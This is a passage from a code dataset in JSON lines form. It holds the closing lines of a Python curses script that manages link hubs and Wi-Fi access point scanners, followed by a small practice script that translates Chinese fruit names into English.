menu')\n\t\tlink_hubs.hubs_display(link_hubs_win)\n\n\tlogger.debug(\"loop exited\")\n\tstop_access_point_scanners()\n\tstop_wifi_event.wait()\n\ncurses.wrapper(main)\n\n","sub_path":"manufacturing_link_hub.py","file_name":"manufacturing_link_hub.py","file_ext":"py","file_size_in_byte":1715,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"360970311","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Nov 16 21:43:18 2018\n\n@author: User\n\"\"\"\n\na = input(\"輸入水果名稱(香蕉,草莓,蘋果,鳳梨,芭樂) :\")\nfruit = {\"香蕉\":\"banana\",\"草莓\":\"strawberry\",\"蘋果\":\"apple\",\"鳳梨\":\"pineapple\",\"芭樂\":\"guava\"}\nprint (fruit[a])","sub_path":"python practice/平常/學弟問題.py","file_name":"學弟問題.py","file_ext":"py","file_size_in_byte":275,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}